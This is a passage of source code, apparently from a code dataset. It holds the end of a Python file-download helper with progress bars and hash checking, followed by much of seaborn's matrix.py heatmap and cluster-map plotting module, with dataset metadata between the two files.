A more advance version of urllib.request.urlretrieve with support of progress bars,
automatic file name, cache and file hash
"""
if headers is None:
headers = {}
dir_prefix = os.path.expanduser(dir_prefix)
if fname is None and not content_disposition:
fname = filename_from_url(url)
# Check if file already exists before doing any request
if fname is not None and os.path.exists(os.path.join(dir_prefix, fname)) and not force_download:
if file_hash is not None and not validate_file(os.path.join(dir_prefix, fname), file_hash, hash_algorithm):
_warn_about_different_hash(file_hash, hash_algorithm)
else:
return os.path.join(dir_prefix, fname)
request = Request(url, headers=headers)
with urlopen(request, timeout=timeout) as response:
headers = response.info()
if callable(fname):
fname = fname(response)
if fname is None:
fname = headers.get_filename()
if fname is None:
fname = filename_from_url(url)
if os.path.isabs(fname):
file_path = fname
else:
os.makedirs(dir_prefix, exist_ok=True)
file_path = os.path.join(dir_prefix, fname)
_, extension = splitext(fname)
if not extension:
extension = guess_extension(headers.get_content_type() or "")
if extension is not None:
file_path += extension
if os.path.exists(file_path) and not force_download:
if file_hash is not None and not validate_file(file_path, file_hash, hash_algorithm):
_warn_about_different_hash(file_hash, hash_algorithm)
else:
return file_path
content_length = int(headers.get("Content-Length", -1))
blocknum = 0
bytes_read = 0
download_file_path = file_path + ".download"
with open(download_file_path, "wb") as fp, tqdm(total=content_length, unit='B', unit_scale=True, miniters=1,
unit_divisor=1024, desc="Downloading {}...".format(fname),
disable=not progressbar) as pbar:
while True:
block = response.read(blocksize)
if not block:
break
fp.write(block)
blocknum += 1
bytes_read += len(block)
if pbar is not None:
pbar.update(blocksize)
if reporthook is not None:
reporthook(blocknum, blocksize, content_length)
if content_length >= 0 and bytes_read < content_length:
error_msg = "retrieval incomplete: got only {} out of {} bytes".format(bytes_read, content_length)
raise ContentTooShortError(error_msg, (download_file_path, headers))
os.rename(download_file_path, file_path)
return file_path
| 37.203125 | 118 | 0.654067 |
a5fc7fac6aa51c0fa279a66ed698b75b4d61b9b6 | 50,875 | py | Python | seaborn/matrix.py | vinayakreddy/seaborn | 0fba83b47c7a2650f5549bd9b551d4057fb3c97a | [
"BSD-3-Clause"
] | 1 | 2020-08-05T10:55:54.000Z | 2020-08-05T10:55:54.000Z | seaborn/matrix.py | vinayakreddy/seaborn | 0fba83b47c7a2650f5549bd9b551d4057fb3c97a | [
"BSD-3-Clause"
] | null | null | null | seaborn/matrix.py | vinayakreddy/seaborn | 0fba83b47c7a2650f5549bd9b551d4057fb3c97a | [
"BSD-3-Clause"
] | null | null | null | """Functions to visualize matrices of data."""
from __future__ import division
import itertools
import warnings
import matplotlib as mpl
from matplotlib.collections import LineCollection
import matplotlib.pyplot as plt
from matplotlib import gridspec
import numpy as np
import pandas as pd
from scipy.cluster import hierarchy
from . import cm
from .axisgrid import Grid
from .utils import (despine, axis_ticklabels_overlap, relative_luminance,
to_utf8)
__all__ = ["heatmap", "clustermap"]
def _index_to_label(index):
"""Convert a pandas index or multiindex to an axis label."""
if isinstance(index, pd.MultiIndex):
return "-".join(map(to_utf8, index.names))
else:
return index.name
def _index_to_ticklabels(index):
"""Convert a pandas index or multiindex into ticklabels."""
if isinstance(index, pd.MultiIndex):
return ["-".join(map(to_utf8, i)) for i in index.values]
else:
return index.values
def _convert_colors(colors):
"""Convert either a list of colors or nested lists of colors to RGB."""
to_rgb = mpl.colors.colorConverter.to_rgb
if isinstance(colors, pd.DataFrame):
# Convert dataframe
return pd.DataFrame({col: colors[col].map(to_rgb)
for col in colors})
elif isinstance(colors, pd.Series):
return colors.map(to_rgb)
else:
try:
to_rgb(colors[0])
# If this works, there is only one level of colors
return list(map(to_rgb, colors))
except ValueError:
# If we get here, we have nested lists
return [list(map(to_rgb, l)) for l in colors]
def _matrix_mask(data, mask):
"""Ensure that data and mask are compatabile and add missing values.
Values will be plotted for cells where ``mask`` is ``False``.
``data`` is expected to be a DataFrame; ``mask`` can be an array or
a DataFrame.
"""
if mask is None:
mask = np.zeros(data.shape, np.bool)
if isinstance(mask, np.ndarray):
# For array masks, ensure that shape matches data then convert
if mask.shape != data.shape:
raise ValueError("Mask must have the same shape as data.")
mask = pd.DataFrame(mask,
index=data.index,
columns=data.columns,
dtype=np.bool)
elif isinstance(mask, pd.DataFrame):
# For DataFrame masks, ensure that semantic labels match data
if not mask.index.equals(data.index) \
and mask.columns.equals(data.columns):
err = "Mask must have the same index and columns as data."
raise ValueError(err)
# Add any cells with missing data to the mask
# This works around an issue where `plt.pcolormesh` doesn't represent
# missing data properly
mask = mask | pd.isnull(data)
return mask
class _HeatMapper(object):
"""Draw a heatmap plot of a matrix with nice labels and colormaps."""
def __init__(self, data, vmin, vmax, cmap, center, robust, annot, fmt,
annot_kws, cbar, cbar_kws,
xticklabels=True, yticklabels=True, mask=None):
"""Initialize the plotting object."""
# We always want to have a DataFrame with semantic information
# and an ndarray to pass to matplotlib
if isinstance(data, pd.DataFrame):
plot_data = data.values
else:
plot_data = np.asarray(data)
data = pd.DataFrame(plot_data)
# Validate the mask and convet to DataFrame
mask = _matrix_mask(data, mask)
plot_data = np.ma.masked_where(np.asarray(mask), plot_data)
# Get good names for the rows and columns
xtickevery = 1
if isinstance(xticklabels, int):
xtickevery = xticklabels
xticklabels = _index_to_ticklabels(data.columns)
elif xticklabels is True:
xticklabels = _index_to_ticklabels(data.columns)
elif xticklabels is False:
xticklabels = []
ytickevery = 1
if isinstance(yticklabels, int):
ytickevery = yticklabels
yticklabels = _index_to_ticklabels(data.index)
elif yticklabels is True:
yticklabels = _index_to_ticklabels(data.index)
elif yticklabels is False:
yticklabels = []
# Get the positions and used label for the ticks
nx, ny = data.T.shape
if not len(xticklabels):
self.xticks = []
self.xticklabels = []
elif isinstance(xticklabels, str) and xticklabels == "auto":
self.xticks = "auto"
self.xticklabels = _index_to_ticklabels(data.columns)
else:
self.xticks, self.xticklabels = self._skip_ticks(xticklabels,
xtickevery)
if not len(yticklabels):
self.yticks = []
self.yticklabels = []
elif isinstance(yticklabels, str) and yticklabels == "auto":
self.yticks = "auto"
self.yticklabels = _index_to_ticklabels(data.index)
else:
self.yticks, self.yticklabels = self._skip_ticks(yticklabels,
ytickevery)
# Get good names for the axis labels
xlabel = _index_to_label(data.columns)
ylabel = _index_to_label(data.index)
self.xlabel = xlabel if xlabel is not None else ""
self.ylabel = ylabel if ylabel is not None else ""
# Determine good default values for the colormapping
self._determine_cmap_params(plot_data, vmin, vmax,
cmap, center, robust)
# Sort out the annotations
if annot is None or annot is False:
annot = False
annot_data = None
else:
if isinstance(annot, bool):
annot_data = plot_data
else:
annot_data = np.asarray(annot)
if annot_data.shape != plot_data.shape:
err = "`data` and `annot` must have same shape."
raise ValueError(err)
annot = True
# Save other attributes to the object
self.data = data
self.plot_data = plot_data
self.annot = annot
self.annot_data = annot_data
self.fmt = fmt
self.annot_kws = {} if annot_kws is None else annot_kws.copy()
self.cbar = cbar
self.cbar_kws = {} if cbar_kws is None else cbar_kws.copy()
def _determine_cmap_params(self, plot_data, vmin, vmax,
cmap, center, robust):
"""Use some heuristics to set good defaults for colorbar and range."""
calc_data = plot_data.data[~np.isnan(plot_data.data)]
if vmin is None:
vmin = np.percentile(calc_data, 2) if robust else calc_data.min()
if vmax is None:
vmax = np.percentile(calc_data, 98) if robust else calc_data.max()
self.vmin, self.vmax = vmin, vmax
# Choose default colormaps if not provided
if cmap is None:
if center is None:
self.cmap = cm.rocket
else:
self.cmap = cm.icefire
elif isinstance(cmap, str):
self.cmap = mpl.cm.get_cmap(cmap)
elif isinstance(cmap, list):
self.cmap = mpl.colors.ListedColormap(cmap)
else:
self.cmap = cmap
# Recenter a divergent colormap
if center is not None:
# Copy bad values
# in mpl<3.2 only masked values are honored with "bad" color spec
# (see https://github.com/matplotlib/matplotlib/pull/14257)
bad = self.cmap(np.ma.masked_invalid([np.nan]))[0]
# under/over values are set for sure when cmap extremes
# do not map to the same color as +-inf
under = self.cmap(-np.inf)
over = self.cmap(np.inf)
under_set = under != self.cmap(0)
over_set = over != self.cmap(self.cmap.N - 1)
vrange = max(vmax - center, center - vmin)
normlize = mpl.colors.Normalize(center - vrange, center + vrange)
cmin, cmax = normlize([vmin, vmax])
cc = np.linspace(cmin, cmax, 256)
self.cmap = mpl.colors.ListedColormap(self.cmap(cc))
self.cmap.set_bad(bad)
if under_set:
self.cmap.set_under(under)
if over_set:
self.cmap.set_over(over)
def _annotate_heatmap(self, ax, mesh):
"""Add textual labels with the value in each cell."""
mesh.update_scalarmappable()
height, width = self.annot_data.shape
xpos, ypos = np.meshgrid(np.arange(width) + .5, np.arange(height) + .5)
for x, y, m, color, val in zip(xpos.flat, ypos.flat,
mesh.get_array(), mesh.get_facecolors(),
self.annot_data.flat):
if m is not np.ma.masked:
lum = relative_luminance(color)
text_color = ".15" if lum > .408 else "w"
annotation = ("{:" + self.fmt + "}").format(val)
text_kwargs = dict(color=text_color, ha="center", va="center")
text_kwargs.update(self.annot_kws)
ax.text(x, y, annotation, **text_kwargs)
def _skip_ticks(self, labels, tickevery):
"""Return ticks and labels at evenly spaced intervals."""
n = len(labels)
if tickevery == 0:
ticks, labels = [], []
elif tickevery == 1:
ticks, labels = np.arange(n) + .5, labels
else:
start, end, step = 0, n, tickevery
ticks = np.arange(start, end, step) + .5
labels = labels[start:end:step]
return ticks, labels
def _auto_ticks(self, ax, labels, axis):
"""Determine ticks and ticklabels that minimize overlap."""
transform = ax.figure.dpi_scale_trans.inverted()
bbox = ax.get_window_extent().transformed(transform)
size = [bbox.width, bbox.height][axis]
axis = [ax.xaxis, ax.yaxis][axis]
tick, = axis.set_ticks([0])
fontsize = tick.label1.get_size()
max_ticks = int(size // (fontsize / 72))
if max_ticks < 1:
return [], []
tick_every = len(labels) // max_ticks + 1
tick_every = 1 if tick_every == 0 else tick_every
ticks, labels = self._skip_ticks(labels, tick_every)
return ticks, labels
def plot(self, ax, cax, kws):
"""Draw the heatmap on the provided Axes."""
# Remove all the Axes spines
despine(ax=ax, left=True, bottom=True)
# Draw the heatmap
mesh = ax.pcolormesh(self.plot_data, vmin=self.vmin, vmax=self.vmax,
cmap=self.cmap, **kws)
# Set the axis limits
ax.set(xlim=(0, self.data.shape[1]), ylim=(0, self.data.shape[0]))
# Invert the y axis to show the plot in matrix form
ax.invert_yaxis()
# Possibly add a colorbar
if self.cbar:
cb = ax.figure.colorbar(mesh, cax, ax, **self.cbar_kws)
cb.outline.set_linewidth(0)
# If rasterized is passed to pcolormesh, also rasterize the
# colorbar to avoid white lines on the PDF rendering
if kws.get('rasterized', False):
cb.solids.set_rasterized(True)
# Add row and column labels
if isinstance(self.xticks, str) and self.xticks == "auto":
xticks, xticklabels = self._auto_ticks(ax, self.xticklabels, 0)
else:
xticks, xticklabels = self.xticks, self.xticklabels
if isinstance(self.yticks, str) and self.yticks == "auto":
yticks, yticklabels = self._auto_ticks(ax, self.yticklabels, 1)
else:
yticks, yticklabels = self.yticks, self.yticklabels
ax.set(xticks=xticks, yticks=yticks)
xtl = ax.set_xticklabels(xticklabels)
ytl = ax.set_yticklabels(yticklabels, rotation="vertical")
# Possibly rotate them if they overlap
if hasattr(ax.figure.canvas, "get_renderer"):
ax.figure.draw(ax.figure.canvas.get_renderer())
if axis_ticklabels_overlap(xtl):
plt.setp(xtl, rotation="vertical")
if axis_ticklabels_overlap(ytl):
plt.setp(ytl, rotation="horizontal")
# Add the axis labels
ax.set(xlabel=self.xlabel, ylabel=self.ylabel)
# Annotate the cells with the formatted values
if self.annot:
self._annotate_heatmap(ax, mesh)
def heatmap(data, vmin=None, vmax=None, cmap=None, center=None, robust=False,
annot=None, fmt=".2g", annot_kws=None,
linewidths=0, linecolor="white",
cbar=True, cbar_kws=None, cbar_ax=None,
square=False, xticklabels="auto", yticklabels="auto",
mask=None, ax=None, **kwargs):
"""Plot rectangular data as a color-encoded matrix.
This is an Axes-level function and will draw the heatmap into the
currently-active Axes if none is provided to the ``ax`` argument. Part of
this Axes space will be taken and used to plot a colormap, unless ``cbar``
is False or a separate Axes is provided to ``cbar_ax``.
Parameters
----------
data : rectangular dataset
2D dataset that can be coerced into an ndarray. If a Pandas DataFrame
is provided, the index/column information will be used to label the
columns and rows.
vmin, vmax : floats, optional
Values to anchor the colormap, otherwise they are inferred from the
data and other keyword arguments.
cmap : matplotlib colormap name or object, or list of colors, optional
The mapping from data values to color space. If not provided, the
default will depend on whether ``center`` is set.
center : float, optional
The value at which to center the colormap when plotting divergant data.
Using this parameter will change the default ``cmap`` if none is
specified.
robust : bool, optional
If True and ``vmin`` or ``vmax`` are absent, the colormap range is
computed with robust quantiles instead of the extreme values.
annot : bool or rectangular dataset, optional
If True, write the data value in each cell. If an array-like with the
same shape as ``data``, then use this to annotate the heatmap instead
of the data. Note that DataFrames will match on position, not index.
fmt : string, optional
String formatting code to use when adding annotations.
annot_kws : dict of key, value mappings, optional
Keyword arguments for ``ax.text`` when ``annot`` is True.
linewidths : float, optional
Width of the lines that will divide each cell.
linecolor : color, optional
Color of the lines that will divide each cell.
cbar : boolean, optional
Whether to draw a colorbar.
cbar_kws : dict of key, value mappings, optional
Keyword arguments for `fig.colorbar`.
cbar_ax : matplotlib Axes, optional
Axes in which to draw the colorbar, otherwise take space from the
main Axes.
square : boolean, optional
If True, set the Axes aspect to "equal" so each cell will be
square-shaped.
xticklabels, yticklabels : "auto", bool, list-like, or int, optional
If True, plot the column names of the dataframe. If False, don't plot
the column names. If list-like, plot these alternate labels as the
xticklabels. If an integer, use the column names but plot only every
n label. If "auto", try to densely plot non-overlapping labels.
mask : boolean array or DataFrame, optional
If passed, data will not be shown in cells where ``mask`` is True.
Cells with missing values are automatically masked.
ax : matplotlib Axes, optional
Axes in which to draw the plot, otherwise use the currently-active
Axes.
kwargs : other keyword arguments
All other keyword arguments are passed to
:func:`matplotlib.axes.Axes.pcolormesh`.
Returns
-------
ax : matplotlib Axes
Axes object with the heatmap.
See also
--------
clustermap : Plot a matrix using hierachical clustering to arrange the
rows and columns.
Examples
--------
Plot a heatmap for a numpy array:
.. plot::
:context: close-figs
>>> import numpy as np; np.random.seed(0)
>>> import seaborn as sns; sns.set()
>>> uniform_data = np.random.rand(10, 12)
>>> ax = sns.heatmap(uniform_data)
Change the limits of the colormap:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(uniform_data, vmin=0, vmax=1)
Plot a heatmap for data centered on 0 with a diverging colormap:
.. plot::
:context: close-figs
>>> normal_data = np.random.randn(10, 12)
>>> ax = sns.heatmap(normal_data, center=0)
Plot a dataframe with meaningful row and column labels:
.. plot::
:context: close-figs
>>> flights = sns.load_dataset("flights")
>>> flights = flights.pivot("month", "year", "passengers")
>>> ax = sns.heatmap(flights)
Annotate each cell with the numeric value using integer formatting:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, annot=True, fmt="d")
Add lines between each cell:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, linewidths=.5)
Use a different colormap:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, cmap="YlGnBu")
Center the colormap at a specific value:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, center=flights.loc["January", 1955])
Plot every other column label and don't plot row labels:
.. plot::
:context: close-figs
>>> data = np.random.randn(50, 20)
>>> ax = sns.heatmap(data, xticklabels=2, yticklabels=False)
Don't draw a colorbar:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, cbar=False)
Use different axes for the colorbar:
.. plot::
:context: close-figs
>>> grid_kws = {"height_ratios": (.9, .05), "hspace": .3}
>>> f, (ax, cbar_ax) = plt.subplots(2, gridspec_kw=grid_kws)
>>> ax = sns.heatmap(flights, ax=ax,
... cbar_ax=cbar_ax,
... cbar_kws={"orientation": "horizontal"})
Use a mask to plot only part of a matrix
.. plot::
:context: close-figs
>>> corr = np.corrcoef(np.random.randn(10, 200))
>>> mask = np.zeros_like(corr)
>>> mask[np.triu_indices_from(mask)] = True
>>> with sns.axes_style("white"):
... f, ax = plt.subplots(figsize=(7, 5))
... ax = sns.heatmap(corr, mask=mask, vmax=.3, square=True)
"""
# Initialize the plotter object
plotter = _HeatMapper(data, vmin, vmax, cmap, center, robust, annot, fmt,
annot_kws, cbar, cbar_kws, xticklabels,
yticklabels, mask)
# Add the pcolormesh kwargs here
kwargs["linewidths"] = linewidths
kwargs["edgecolor"] = linecolor
# Draw the plot and return the Axes
if ax is None:
ax = plt.gca()
if square:
ax.set_aspect("equal")
plotter.plot(ax, cbar_ax, kwargs)
return ax
class _DendrogramPlotter(object):
"""Object for drawing tree of similarities between data rows/columns"""
def __init__(self, data, linkage, metric, method, axis, label, rotate):
"""Plot a dendrogram of the relationships between the columns of data
Parameters
----------
data : pandas.DataFrame
Rectangular data
"""
self.axis = axis
if self.axis == 1:
data = data.T
if isinstance(data, pd.DataFrame):
array = data.values
else:
array = np.asarray(data)
data = pd.DataFrame(array)
self.array = array
self.data = data
self.shape = self.data.shape
self.metric = metric
self.method = method
self.axis = axis
self.label = label
self.rotate = rotate
if linkage is None:
self.linkage = self.calculated_linkage
else:
self.linkage = linkage
self.dendrogram = self.calculate_dendrogram()
# Dendrogram ends are always at multiples of 5, who knows why
ticks = 10 * np.arange(self.data.shape[0]) + 5
if self.label:
ticklabels = _index_to_ticklabels(self.data.index)
ticklabels = [ticklabels[i] for i in self.reordered_ind]
if self.rotate:
self.xticks = []
self.yticks = ticks
self.xticklabels = []
self.yticklabels = ticklabels
self.ylabel = _index_to_label(self.data.index)
self.xlabel = ''
else:
self.xticks = ticks
self.yticks = []
self.xticklabels = ticklabels
self.yticklabels = []
self.ylabel = ''
self.xlabel = _index_to_label(self.data.index)
else:
self.xticks, self.yticks = [], []
self.yticklabels, self.xticklabels = [], []
self.xlabel, self.ylabel = '', ''
self.dependent_coord = self.dendrogram['dcoord']
self.independent_coord = self.dendrogram['icoord']
def _calculate_linkage_scipy(self):
linkage = hierarchy.linkage(self.array, method=self.method,
metric=self.metric)
return linkage
def _calculate_linkage_fastcluster(self):
import fastcluster
# Fastcluster has a memory-saving vectorized version, but only
# with certain linkage methods, and mostly with euclidean metric
# vector_methods = ('single', 'centroid', 'median', 'ward')
euclidean_methods = ('centroid', 'median', 'ward')
euclidean = self.metric == 'euclidean' and self.method in \
euclidean_methods
if euclidean or self.method == 'single':
return fastcluster.linkage_vector(self.array,
method=self.method,
metric=self.metric)
else:
linkage = fastcluster.linkage(self.array, method=self.method,
metric=self.metric)
return linkage
@property
def calculated_linkage(self):
try:
return self._calculate_linkage_fastcluster()
except ImportError:
if np.product(self.shape) >= 10000:
msg = ("Clustering large matrix with scipy. Installing "
"`fastcluster` may give better performance.")
warnings.warn(msg)
return self._calculate_linkage_scipy()
def calculate_dendrogram(self):
"""Calculates a dendrogram based on the linkage matrix
Made a separate function, not a property because don't want to
recalculate the dendrogram every time it is accessed.
Returns
-------
dendrogram : dict
Dendrogram dictionary as returned by scipy.cluster.hierarchy
.dendrogram. The important key-value pairing is
"reordered_ind" which indicates the re-ordering of the matrix
"""
return hierarchy.dendrogram(self.linkage, no_plot=True,
color_threshold=-np.inf)
@property
def reordered_ind(self):
"""Indices of the matrix, reordered by the dendrogram"""
return self.dendrogram['leaves']
def plot(self, ax, tree_kws):
"""Plots a dendrogram of the similarities between data on the axes
Parameters
----------
ax : matplotlib.axes.Axes
Axes object upon which the dendrogram is plotted
"""
tree_kws = {} if tree_kws is None else tree_kws.copy()
tree_kws.setdefault("linewidths", .5)
tree_kws.setdefault("colors", ".2")
if self.rotate and self.axis == 0:
coords = zip(self.dependent_coord, self.independent_coord)
else:
coords = zip(self.independent_coord, self.dependent_coord)
lines = LineCollection([list(zip(x, y)) for x, y in coords],
**tree_kws)
ax.add_collection(lines)
number_of_leaves = len(self.reordered_ind)
max_dependent_coord = max(map(max, self.dependent_coord))
if self.rotate:
ax.yaxis.set_ticks_position('right')
# Constants 10 and 1.05 come from
# `scipy.cluster.hierarchy._plot_dendrogram`
ax.set_ylim(0, number_of_leaves * 10)
ax.set_xlim(0, max_dependent_coord * 1.05)
ax.invert_xaxis()
ax.invert_yaxis()
else:
# Constants 10 and 1.05 come from
# `scipy.cluster.hierarchy._plot_dendrogram`
ax.set_xlim(0, number_of_leaves * 10)
ax.set_ylim(0, max_dependent_coord * 1.05)
despine(ax=ax, bottom=True, left=True)
ax.set(xticks=self.xticks, yticks=self.yticks,
xlabel=self.xlabel, ylabel=self.ylabel)
xtl = ax.set_xticklabels(self.xticklabels)
ytl = ax.set_yticklabels(self.yticklabels, rotation='vertical')
# Force a draw of the plot to avoid matplotlib window error
if hasattr(ax.figure.canvas, "get_renderer"):
ax.figure.draw(ax.figure.canvas.get_renderer())
if len(ytl) > 0 and axis_ticklabels_overlap(ytl):
plt.setp(ytl, rotation="horizontal")
if len(xtl) > 0 and axis_ticklabels_overlap(xtl):
plt.setp(xtl, rotation="vertical")
return self
def dendrogram(data, linkage=None, axis=1, label=True, metric='euclidean',
method='average', rotate=False, tree_kws=None, ax=None):
"""Draw a tree diagram of relationships within a matrix
Parameters
----------
data : pandas.DataFrame
Rectangular data
linkage : numpy.array, optional
Linkage matrix
axis : int, optional
Which axis to use to calculate linkage. 0 is rows, 1 is columns.
label : bool, optional
If True, label the dendrogram at leaves with column or row names
metric : str, optional
Distance metric. Anything valid for scipy.spatial.distance.pdist
method : str, optional
Linkage method to use. Anything valid for
scipy.cluster.hierarchy.linkage
rotate : bool, optional
When plotting the matrix, whether to rotate it 90 degrees
counter-clockwise, so the leaves face right
tree_kws : dict, optional
Keyword arguments for the ``matplotlib.collections.LineCollection``
that is used for plotting the lines of the dendrogram tree.
ax : matplotlib axis, optional
Axis to plot on, otherwise uses current axis
Returns
-------
dendrogramplotter : _DendrogramPlotter
A Dendrogram plotter object.
Notes
-----
Access the reordered dendrogram indices with
dendrogramplotter.reordered_ind
"""
plotter = _DendrogramPlotter(data, linkage=linkage, axis=axis,
metric=metric, method=method,
label=label, rotate=rotate)
if ax is None:
ax = plt.gca()
return plotter.plot(ax=ax, tree_kws=tree_kws)
class ClusterGrid(Grid):
def __init__(self, data, pivot_kws=None, z_score=None, standard_scale=None,
figsize=None, row_colors=None, col_colors=None, mask=None,
dendrogram_ratio=None, colors_ratio=None, cbar_pos=None):
"""Grid object for organizing clustered heatmap input on to axes"""
if isinstance(data, pd.DataFrame):
self.data = data
else:
self.data = pd.DataFrame(data)
self.data2d = self.format_data(self.data, pivot_kws, z_score,
standard_scale)
self.mask = _matrix_mask(self.data2d, mask)
self.fig = plt.figure(figsize=figsize)
self.row_colors, self.row_color_labels = \
self._preprocess_colors(data, row_colors, axis=0)
self.col_colors, self.col_color_labels = \
self._preprocess_colors(data, col_colors, axis=1)
try:
row_dendrogram_ratio, col_dendrogram_ratio = dendrogram_ratio
except TypeError:
row_dendrogram_ratio = col_dendrogram_ratio = dendrogram_ratio
try:
row_colors_ratio, col_colors_ratio = colors_ratio
except TypeError:
row_colors_ratio = col_colors_ratio = colors_ratio
width_ratios = self.dim_ratios(self.row_colors,
row_dendrogram_ratio,
row_colors_ratio)
height_ratios = self.dim_ratios(self.col_colors,
col_dendrogram_ratio,
col_colors_ratio)
nrows = 2 if self.col_colors is None else 3
ncols = 2 if self.row_colors is None else 3
self.gs = gridspec.GridSpec(nrows, ncols,
width_ratios=width_ratios,
height_ratios=height_ratios)
self.ax_row_dendrogram = self.fig.add_subplot(self.gs[-1, 0])
self.ax_col_dendrogram = self.fig.add_subplot(self.gs[0, -1])
self.ax_row_dendrogram.set_axis_off()
self.ax_col_dendrogram.set_axis_off()
self.ax_row_colors = None
self.ax_col_colors = None
if self.row_colors is not None:
self.ax_row_colors = self.fig.add_subplot(
self.gs[-1, 1])
if self.col_colors is not None:
self.ax_col_colors = self.fig.add_subplot(
self.gs[1, -1])
self.ax_heatmap = self.fig.add_subplot(self.gs[-1, -1])
if cbar_pos is None:
self.ax_cbar = self.cax = None
else:
# Initialize the colorbar axes in the gridspec so that tight_layout
# works. We will move it where it belongs later. This is a hack.
self.ax_cbar = self.fig.add_subplot(self.gs[0, 0])
self.cax = self.ax_cbar # Backwards compatability
self.cbar_pos = cbar_pos
self.dendrogram_row = None
self.dendrogram_col = None
def _preprocess_colors(self, data, colors, axis):
"""Preprocess {row/col}_colors to extract labels and convert colors."""
labels = None
if colors is not None:
if isinstance(colors, (pd.DataFrame, pd.Series)):
# Ensure colors match data indices
if axis == 0:
colors = colors.reindex(data.index)
else:
colors = colors.reindex(data.columns)
# Replace na's with background color
# TODO We should set these to transparent instead
colors = colors.fillna('white')
# Extract color values and labels from frame/series
if isinstance(colors, pd.DataFrame):
labels = list(colors.columns)
colors = colors.T.values
else:
if colors.name is None:
labels = [""]
else:
labels = [colors.name]
colors = colors.values
colors = _convert_colors(colors)
return colors, labels
def format_data(self, data, pivot_kws, z_score=None,
standard_scale=None):
"""Extract variables from data or use directly."""
# Either the data is already in 2d matrix format, or need to do a pivot
if pivot_kws is not None:
data2d = data.pivot(**pivot_kws)
else:
data2d = data
if z_score is not None and standard_scale is not None:
raise ValueError(
'Cannot perform both z-scoring and standard-scaling on data')
if z_score is not None:
data2d = self.z_score(data2d, z_score)
if standard_scale is not None:
data2d = self.standard_scale(data2d, standard_scale)
return data2d
@staticmethod
def z_score(data2d, axis=1):
"""Standarize the mean and variance of the data axis
Parameters
----------
data2d : pandas.DataFrame
Data to normalize
axis : int
Which axis to normalize across. If 0, normalize across rows, if 1,
normalize across columns.
Returns
-------
normalized : pandas.DataFrame
Noramlized data with a mean of 0 and variance of 1 across the
specified axis.
"""
if axis == 1:
z_scored = data2d
else:
z_scored = data2d.T
z_scored = (z_scored - z_scored.mean()) / z_scored.std()
if axis == 1:
return z_scored
else:
return z_scored.T
@staticmethod
def standard_scale(data2d, axis=1):
"""Divide the data by the difference between the max and min
Parameters
----------
data2d : pandas.DataFrame
Data to normalize
axis : int
Which axis to normalize across. If 0, normalize across rows, if 1,
normalize across columns.
vmin : int
If 0, then subtract the minimum of the data before dividing by
the range.
Returns
-------
standardized : pandas.DataFrame
Noramlized data with a mean of 0 and variance of 1 across the
specified axis.
"""
# Normalize these values to range from 0 to 1
if axis == 1:
standardized = data2d
else:
standardized = data2d.T
subtract = standardized.min()
standardized = (standardized - subtract) / (
standardized.max() - standardized.min())
if axis == 1:
return standardized
else:
return standardized.T
def dim_ratios(self, colors, dendrogram_ratio, colors_ratio):
"""Get the proportions of the figure taken up by each axes."""
ratios = [dendrogram_ratio]
if colors is not None:
# Colors are encoded as rgb, so ther is an extra dimention
if np.ndim(colors) > 2:
n_colors = len(colors)
else:
n_colors = 1
ratios += [n_colors * colors_ratio]
# Add the ratio for the heatmap itself
ratios.append(1 - sum(ratios))
return ratios
@staticmethod
def color_list_to_matrix_and_cmap(colors, ind, axis=0):
"""Turns a list of colors into a numpy matrix and matplotlib colormap
These arguments can now be plotted using heatmap(matrix, cmap)
and the provided colors will be plotted.
Parameters
----------
colors : list of matplotlib colors
Colors to label the rows or columns of a dataframe.
ind : list of ints
Ordering of the rows or columns, to reorder the original colors
by the clustered dendrogram order
axis : int
Which axis this is labeling
Returns
-------
matrix : numpy.array
A numpy array of integer values, where each corresponds to a color
from the originally provided list of colors
cmap : matplotlib.colors.ListedColormap
"""
# check for nested lists/color palettes.
# Will fail if matplotlib color is list not tuple
if any(issubclass(type(x), list) for x in colors):
all_colors = set(itertools.chain(*colors))
n = len(colors)
m = len(colors[0])
else:
all_colors = set(colors)
n = 1
m = len(colors)
colors = [colors]
color_to_value = dict((col, i) for i, col in enumerate(all_colors))
matrix = np.array([color_to_value[c]
for color in colors for c in color])
shape = (n, m)
matrix = matrix.reshape(shape)
matrix = matrix[:, ind]
if axis == 0:
# row-side:
matrix = matrix.T
cmap = mpl.colors.ListedColormap(all_colors)
return matrix, cmap
def savefig(self, *args, **kwargs):
if 'bbox_inches' not in kwargs:
kwargs['bbox_inches'] = 'tight'
self.fig.savefig(*args, **kwargs)
def plot_dendrograms(self, row_cluster, col_cluster, metric, method,
row_linkage, col_linkage, tree_kws):
# Plot the row dendrogram
if row_cluster:
self.dendrogram_row = dendrogram(
self.data2d, metric=metric, method=method, label=False, axis=0,
ax=self.ax_row_dendrogram, rotate=True, linkage=row_linkage,
tree_kws=tree_kws
)
else:
self.ax_row_dendrogram.set_xticks([])
self.ax_row_dendrogram.set_yticks([])
# PLot the column dendrogram
if col_cluster:
self.dendrogram_col = dendrogram(
self.data2d, metric=metric, method=method, label=False,
axis=1, ax=self.ax_col_dendrogram, linkage=col_linkage,
tree_kws=tree_kws
)
else:
self.ax_col_dendrogram.set_xticks([])
self.ax_col_dendrogram.set_yticks([])
despine(ax=self.ax_row_dendrogram, bottom=True, left=True)
despine(ax=self.ax_col_dendrogram, bottom=True, left=True)
def plot_colors(self, xind, yind, **kws):
"""Plots color labels between the dendrogram and the heatmap
Parameters
----------
heatmap_kws : dict
Keyword arguments heatmap
"""
# Remove any custom colormap and centering
# TODO this code has consistently caused problems when we
# have missed kwargs that need to be excluded that it might
# be better to rewrite *in*clusively.
kws = kws.copy()
kws.pop('cmap', None)
kws.pop('norm', None)
kws.pop('center', None)
kws.pop('annot', None)
kws.pop('vmin', None)
kws.pop('vmax', None)
kws.pop('robust', None)
kws.pop('xticklabels', None)
kws.pop('yticklabels', None)
# Plot the row colors
if self.row_colors is not None:
matrix, cmap = self.color_list_to_matrix_and_cmap(
self.row_colors, yind, axis=0)
# Get row_color labels
if self.row_color_labels is not None:
row_color_labels = self.row_color_labels
else:
row_color_labels = False
heatmap(matrix, cmap=cmap, cbar=False, ax=self.ax_row_colors,
xticklabels=row_color_labels, yticklabels=False, **kws)
# Adjust rotation of labels
if row_color_labels is not False:
plt.setp(self.ax_row_colors.get_xticklabels(), rotation=90)
else:
despine(self.ax_row_colors, left=True, bottom=True)
